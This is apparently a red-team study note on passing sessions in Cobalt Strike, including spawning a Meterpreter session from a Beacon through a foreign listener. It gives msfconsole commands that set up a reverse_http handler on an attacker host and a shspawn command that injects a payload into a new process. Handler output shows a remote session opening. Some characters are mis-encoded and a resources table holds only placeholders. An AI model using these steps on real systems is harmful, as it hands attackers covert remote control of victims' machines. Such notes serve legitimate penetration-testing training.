date: 2024-10-07 draft: true
Secondary Categories: 02 - Lateral Movement 02 - Session Passing Links: Search Tag:π
Beacon Passing
Description:
As we know in Cobalt Strike (and many other C2 frameworks), payloads are tied very closely to listeners. Β Session passing is a process where you spawn a new C2 session from one payload/listener type to another. Β For example, we could have a long-haul Beacon checking in over DNS, which we can use to spawn a different short-haul Beacon over HTTP. Β Itβs also possible to pass sessions between completely different C2 frameworks, such as spawning a Meterpreter session from Beacon.
This is useful for several reasons, including:
- Leverage a capability within a framework that Cobalt Strike doesnβt have.
- Use different C2 frameworks as backup access in the event the current access is lost.
- To emulate specific TTPs.
A great example of this is using the spawn command in Cobalt Strike.
Foreign Listener
You can also use a foreign listener in Cobalt Strike which uses the metasploit staging protocol.
attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://10.10.5.50:8080Go to the listener management in Cobalt Strike and create a new Foreign HTTP listener. Β The stager host and port must match your MSF multi handler.
NOTICE The two downsides to using a foreign listener is that is only supports x86 staged payload and no x64 or stageless.
Spawn & Inject
In Cobalt Strike there are two generic commands that can be utilised for the purpase of the session passing:
shinject: inject into existing processshspawn: spawn a new process and inject into it
beacon> shspawn x64 C:\Payloads\msf_http_x64.bin
[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Redirecting stageless connection from /jeqN5SIPwEzAGcEbowwz7Q-hb8QsIP with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36'
[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (10.10.5.50:8080 -> 127.0.0.1) at 2022-09-05 13:04:53 +0000Resources:
| Title | URL |
|---|---|
| place | holder |
Created Date: November 17th 2022 23:34
Last Modified Date: November 17th 2022 23:34